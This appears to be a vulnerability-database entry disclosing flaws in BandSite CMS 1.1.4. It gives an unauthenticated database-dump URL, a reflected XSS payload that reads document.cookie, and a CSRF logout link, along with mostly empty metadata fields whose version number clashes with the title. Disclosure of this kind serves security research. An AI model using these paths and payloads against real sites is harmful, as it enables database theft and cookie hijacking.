vendor:
CMS
by:
SirGod
N/A
CVSS
N/A
Arbitrary Download Database/XSS/CSRF
N/A
CWE
Product Name: CMS
Affected Version From: 1.1.2004
Affected Version To: 1.1.2004
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
BandSite CMS 1.1.4 Arbitrary Download Database/XSS/CSRF
Go to http://localhost/[Path]/adminpanel/phpmydump.php and the download will begin (database.sql). For XSS, http://localhost/[Path]/merchandise.php?type=[XSS] or http://localhost/[Path]/merchandise.php?type=<script>alert(document.cookie)</script>. For CSRF, if a logged-in user with administrator privileges clicks the following URL, he will be logged out: http://localhost/[Path]/adminpanel/logout.php.
Mitigation:
N/A